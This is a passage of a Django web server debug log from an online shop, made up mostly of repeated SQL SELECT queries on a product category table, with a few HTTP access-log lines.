"shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 13:39:04,850 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 13:39:04,867 utils 4252 140031721535232 (0.013) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 13:39:04,873 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 13:39:04,889 utils 4252 140031721535232 (0.011) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 13:39:04] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 13:39:06,939 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 13:39:06,947 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 13:39:06,951 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 13:39:06,954 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 13:39:06,959 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 13:39:06,961 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 13:39:06,965 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 13:39:06,967 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 13:39:06,970 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 13:39:06,975 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 13:39:06,979 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 13:39:06,983 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 13:39:06,986 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 13:39:06,989 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 13:39:06,993 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 13:39:06,996 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 13:39:06,998 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 13:39:07,001 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 13:39:07,004 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 13:39:07,009 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 13:39:07,011 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 13:39:07,013 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 13:39:07,015 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 13:39:07,017 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 13:39:07,020 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 13:39:07,023 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 13:39:07,025 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 13:39:07,028 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 13:39:07,030 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 13:39:07,032 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 13:39:07,035 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 13:39:07,038 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 13:39:07,040 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 13:39:07,042 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 13:39:07,044 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 13:39:07,049 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 13:39:07,051 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 13:39:07,054 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 13:39:07,056 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 13:39:07,058 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 13:39:07,061 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 13:39:07,065 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 13:39:07,069 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 13:39:07,072 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 13:39:07,076 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 13:39:07,078 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 13:39:07] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [18/Dec/2019 13:39:09] "GET / HTTP/1.0" 302 0 [18/Dec/2019 13:40:01] "GET /whm-server-status HTTP/1.0" 301 0 DEBUG 2019-12-18 13:40:46,003 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 13:40:46,010 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 13:40:46,013 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 13:40:46,016 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 13:40:46,019 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 13:40:46,021 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 13:40:46,023 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 13:40:46,026 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 13:40:46,028 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 13:40:46,031 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 13:40:46,037 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 13:40:46,039 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 13:40:46,042 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 13:40:46,044 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 13:40:46,047 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 13:40:46,053 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 13:40:46,055 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 